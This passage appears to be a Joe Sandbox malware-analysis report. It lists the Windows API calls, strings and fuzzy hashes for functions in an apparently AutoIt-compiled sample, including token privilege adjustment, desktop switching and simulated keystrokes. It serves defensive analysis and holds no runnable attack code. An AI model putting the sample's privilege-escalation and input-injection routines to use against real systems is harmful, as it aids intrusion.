                                                • Instruction ID: b3045925a7e8f1310dc3137a592641b751e1ffde904a61a4d3553d077f555420
                                                • Opcode Fuzzy Hash: 9e34a2c4e3c7f89d0665d39225dec932c90b7449da9f221b1589d17dc419099d
                                                • Instruction Fuzzy Hash: 3F41E774A043419FDB24DF14C494B5ABBE1BF49314F09889CE8998B762C736E845EF52
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: dde83541df4c23aa4f09cfe0afb9d9cc77f981f836310197f8e4281639423d99
                                                • Instruction ID: 73c1be28b44b622216230a6b8ceb9a3b6e6867b6a3a84b3c232626572638aaf6
                                                • Opcode Fuzzy Hash: dde83541df4c23aa4f09cfe0afb9d9cc77f981f836310197f8e4281639423d99
                                                • Instruction Fuzzy Hash: CE2124B2A04609EBDB246F26E8417EA7FB8FF54350F208429E486C5194EB31C090EB45
                                                APIs
                                                  • Part of subcall function 00F84BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00F84BEF
                                                  • Part of subcall function 00FA525B: __wfsopen.LIBCMT ref: 00FA5266
                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,010452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F84E0F
                                                  • Part of subcall function 00F84B6A: FreeLibrary.KERNEL32(00000000), ref: 00F84BA4
                                                  • Part of subcall function 00F84C70: _memmove.LIBCMT ref: 00F84CBA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                • String ID:
                                                • API String ID: 1396898556-0
                                                • Opcode ID: cf8ddb8c4d736058296b05420ed22c54009b619a7e2fb66ed51dea328d5dc5d0
                                                • Instruction ID: 0ae06cf97a1e3c07b1589dfd9b316e0fec5c9935431112d62f0610733979b570
                                                • Opcode Fuzzy Hash: cf8ddb8c4d736058296b05420ed22c54009b619a7e2fb66ed51dea328d5dc5d0
                                                • Instruction Fuzzy Hash: D7119132600707ABCF25FF75CC16FEE77A9AF84710F108829F541A7181EA79AA01BB51
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: ef4a7c9f20585122a4918af1942b3dce97d957eb9db60122513fdcf3ddb682f6
                                                • Instruction ID: 440418ee7468b7e33d462aca4d67ff95d41a0b26980b0a38531a121fa011649f
                                                • Opcode Fuzzy Hash: ef4a7c9f20585122a4918af1942b3dce97d957eb9db60122513fdcf3ddb682f6
                                                • Instruction Fuzzy Hash: DF2148B1908342DFDB14EF54C844B5ABBE0BF89314F05885CF88997762C735E805EB92
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 8552a27d75c028384bb5dded52737eaba16b17fc97a4acef3cde4278dbd9ffc2
                                                • Instruction ID: 6796de707a92a2e9d67699ad2945a3e06f5ca8f83bf6a918b03edb6ea0ed4732
                                                • Opcode Fuzzy Hash: 8552a27d75c028384bb5dded52737eaba16b17fc97a4acef3cde4278dbd9ffc2
                                                • Instruction Fuzzy Hash: 95012BB36007016EC320AF29DC02FA777949B45360F108529F51ACA190DE35E440A7A0
                                                APIs
                                                • __lock_file.LIBCMT ref: 00FA48A6
                                                  • Part of subcall function 00FA8B28: __getptd_noexit.LIBCMT ref: 00FA8B28
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: __getptd_noexit__lock_file
                                                • String ID:
                                                • API String ID: 2597487223-0
                                                • Opcode ID: 05fe4de736a5cc04484115667c2dd2379bbc3b9644fdcc8e5cfdacfb7ce65982
                                                • Instruction ID: 85b10a4bef4e11e2f3d1d86c630a431e51d1473fe8d04f96b90bf794ba1da9a1
                                                • Opcode Fuzzy Hash: 05fe4de736a5cc04484115667c2dd2379bbc3b9644fdcc8e5cfdacfb7ce65982
                                                • Instruction Fuzzy Hash: 84F0FFB1C00208ABDF11AFA09C063AE37A0AF82376F058414B4209B182CBFC8952FB51
                                                APIs
                                                • FreeLibrary.KERNEL32(?,?,010452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00F84E7E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 928a521e5ffb6e57124b6e94e68f1fe4d6f2ca40f0b86b2c1f07f0f5aa56d85a
                                                • Instruction ID: 3cdf2249f54ea798e25e0c4705c045c52295aadc717b9ad62327ebfc04648b40
                                                • Opcode Fuzzy Hash: 928a521e5ffb6e57124b6e94e68f1fe4d6f2ca40f0b86b2c1f07f0f5aa56d85a
                                                • Instruction Fuzzy Hash: 03F03971905712CFCB34AF64E8948A2BBE1BF553393208A3EE2D682610C776A840EF40
                                                APIs
                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FA07B0
                                                  • Part of subcall function 00F87BCC: _memmove.LIBCMT ref: 00F87C06
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: LongNamePath_memmove
                                                • String ID:
                                                • API String ID: 2514874351-0
                                                • Opcode ID: 936ef9f4f5875366ed24124a13dbc329e02d15594c8e9453e7fc94f88e04fa1e
                                                • Instruction ID: 820c461a4678225896d4d5aec8e835159c5089fc520d7c38c5efcda13185dd50
                                                • Opcode Fuzzy Hash: 936ef9f4f5875366ed24124a13dbc329e02d15594c8e9453e7fc94f88e04fa1e
                                                • Instruction Fuzzy Hash: 2BE0863690422857C731A6599C05FEA779DDBC86A0F0441B5FC08D7209D9659C909690
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: __wfsopen
                                                • String ID:
                                                • API String ID: 197181222-0
                                                • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                • Instruction ID: a2fc04e498be6f68726cc8c0af70ed0153021f9fdcbe6533d6b0630d3d6fc604
                                                • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                • Instruction Fuzzy Hash: 7DB092B644020C77CE012A82EC02B893B699B42B64F408020FB0C18162A677A664AA89
                                                APIs
                                                • Sleep.KERNELBASE(000001F4), ref: 01995559
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2208151613.0000000001993000.00000040.00000020.00020000.00000000.sdmp, Offset: 01993000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1993000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction ID: 1db4c7ea2a38b12d13818fd3f7a10de99eaa2b407e460db8fc7e95e9658d0df9
                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction Fuzzy Hash: 3FE0E67494010EDFDB00DFB8D54969E7FB4EF04301F100261FD05D2281D6309E508A62
                                                APIs
                                                  • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0100CB37
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0100CB95
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0100CBD6
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0100CC00
                                                • SendMessageW.USER32 ref: 0100CC29
                                                • _wcsncpy.LIBCMT ref: 0100CC95
                                                • GetKeyState.USER32(00000011), ref: 0100CCB6
                                                • GetKeyState.USER32(00000009), ref: 0100CCC3
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0100CCD9
                                                • GetKeyState.USER32(00000010), ref: 0100CCE3
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0100CD0C
                                                • SendMessageW.USER32 ref: 0100CD33
                                                • SendMessageW.USER32(?,00001030,?,0100B348), ref: 0100CE37
                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0100CE4D
                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0100CE60
                                                • SetCapture.USER32(?), ref: 0100CE69
                                                • ClientToScreen.USER32(?,?), ref: 0100CECE
                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0100CEDB
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0100CEF5
                                                • ReleaseCapture.USER32 ref: 0100CF00
                                                • GetCursorPos.USER32(?), ref: 0100CF3A
                                                • ScreenToClient.USER32(?,?), ref: 0100CF47
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0100CFA3
                                                • SendMessageW.USER32 ref: 0100CFD1
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0100D00E
                                                • SendMessageW.USER32 ref: 0100D03D
                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0100D05E
                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0100D06D
                                                • GetCursorPos.USER32(?), ref: 0100D08D
                                                • ScreenToClient.USER32(?,?), ref: 0100D09A
                                                • GetParent.USER32(?), ref: 0100D0BA
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0100D123
                                                • SendMessageW.USER32 ref: 0100D154
                                                • ClientToScreen.USER32(?,?), ref: 0100D1B2
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0100D1E2
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0100D20C
                                                • SendMessageW.USER32 ref: 0100D22F
                                                • ClientToScreen.USER32(?,?), ref: 0100D281
                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0100D2B5
                                                  • Part of subcall function 00F825DB: GetWindowLongW.USER32(?,000000EB), ref: 00F825EC
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0100D351
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                • String ID: @GUI_DRAGID$F
                                                • API String ID: 3977979337-4164748364
                                                • Opcode ID: 1cc139a2e600bc4102c16b20fe4e71b1b3dbaa577341e6f660909e2e60d6f2d5
                                                • Instruction ID: f201fba2387ab68268067b83ff33e055d2a9dd381425af7834ead076d06d90ec
                                                • Opcode Fuzzy Hash: 1cc139a2e600bc4102c16b20fe4e71b1b3dbaa577341e6f660909e2e60d6f2d5
                                                • Instruction Fuzzy Hash: 51429D74204641AFF722DF68C984AAABBE5FF48310F14069DF6D5972E1CB32E841EB51
                                                APIs
                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 010084D0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: %d/%02d/%02d
                                                • API String ID: 3850602802-328681919
                                                • Opcode ID: 5ef51604bfc81197fbce0b41a41ef5c775d19321b542a0508b3ef23407f9d41a
                                                • Instruction ID: f29c2ed5b8eae29ea2e80ea8215271d17b5d64c68babe312248ee0003b694958
                                                • Opcode Fuzzy Hash: 5ef51604bfc81197fbce0b41a41ef5c775d19321b542a0508b3ef23407f9d41a
                                                • Instruction Fuzzy Hash: 0312BF71900305ABFB269F28CC49FAF7BE4BF49310F11816AF995EA2D1DB799941CB10
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: _memmove$_memset
                                                • String ID: DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                • API String ID: 1357608183-1798697756
                                                • Opcode ID: 5d65c790a80b635457c234a0e4c6d37a373087acde55386f09cefddd4e3a9b31
                                                • Instruction ID: 55ba0e0e0897e9da2dc259e9888a6cb94df19825cb8f6a720323c749595c1cde
                                                • Opcode Fuzzy Hash: 5d65c790a80b635457c234a0e4c6d37a373087acde55386f09cefddd4e3a9b31
                                                • Instruction Fuzzy Hash: D7939276E043159BDF24DF58C881BADB7B2FF58320F28816AD945AB381E7749D81EB40
                                                APIs
                                                • GetForegroundWindow.USER32(00000000,?), ref: 00F848DF
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00FBD665
                                                • IsIconic.USER32(?), ref: 00FBD66E
                                                • ShowWindow.USER32(?,00000009), ref: 00FBD67B
                                                • SetForegroundWindow.USER32(?), ref: 00FBD685
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FBD69B
                                                • GetCurrentThreadId.KERNEL32 ref: 00FBD6A2
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00FBD6AE
                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FBD6BF
                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 00FBD6C7
                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 00FBD6CF
                                                • SetForegroundWindow.USER32(?), ref: 00FBD6D2
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBD6E7
                                                • keybd_event.USER32(00000012,00000000), ref: 00FBD6F2
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBD6FC
                                                • keybd_event.USER32(00000012,00000000), ref: 00FBD701
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBD70A
                                                • keybd_event.USER32(00000012,00000000), ref: 00FBD70F
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 00FBD719
                                                • keybd_event.USER32(00000012,00000000), ref: 00FBD71E
                                                • SetForegroundWindow.USER32(?), ref: 00FBD721
                                                • AttachThreadInput.USER32(?,?,00000000), ref: 00FBD748
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 4125248594-2988720461
                                                • Opcode ID: 152ea62fa437fcdede96fd12018cd0f476f5a40856975fe166428653bc40057f
                                                • Instruction ID: 8d6d257335c3c7db695967ae2bc524856fd2b91918cd42d331f0372e6e98342f
                                                • Opcode Fuzzy Hash: 152ea62fa437fcdede96fd12018cd0f476f5a40856975fe166428653bc40057f
                                                • Instruction Fuzzy Hash: C1315271A403197BEB316B629C49FBF7F6CEB44B61F104015FA04EA1C1DAB65901BFA1
                                                APIs
                                                  • Part of subcall function 00FD87E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00FD882B
                                                  • Part of subcall function 00FD87E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00FD8858
                                                  • Part of subcall function 00FD87E1: GetLastError.KERNEL32 ref: 00FD8865
                                                • _memset.LIBCMT ref: 00FD8353
                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00FD83A5
                                                • CloseHandle.KERNEL32(?), ref: 00FD83B6
                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00FD83CD
                                                • GetProcessWindowStation.USER32 ref: 00FD83E6
                                                • SetProcessWindowStation.USER32(00000000), ref: 00FD83F0
                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00FD840A
                                                  • Part of subcall function 00FD81CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00FD8309), ref: 00FD81E0
                                                  • Part of subcall function 00FD81CB: CloseHandle.KERNEL32(?,?,00FD8309), ref: 00FD81F2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2207570492.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                • Associated: 00000000.00000002.2207538911.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207642807.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207714510.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.000000000104E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2207734200.0000000001070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_f80000_psibx9rXra.jbxd
                                                Similarity
                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                • String ID: $default$winsta0
                                                • API String ID: 2063423040-1027155976
                                                • Opcode ID: 6a55974ec1ca5374258d971a1ad798a007d2e69ab1b62c64afd0206708af9b68
                                                • Instruction ID: 57ea26db24b46276b6c2368ecad9f30b7ede71267c743887ffe874572989c5d7
                                                • Opcode Fuzzy Hash: 6a55974ec1ca5374258d971a1ad798a007d2e69ab1b62c64afd0206708af9b68
                                                • Instruction Fuzzy Hash: 66818DB1D00209AFDF21DFA4DC45AEE7B7AFF08364F18415AF914A6251DB358E16EB20
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 00FEC78D
                                                • FindClose.KERNEL32(00000000), ref: 00FEC7E1
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FEC806
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00FEC81D
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00FEC844
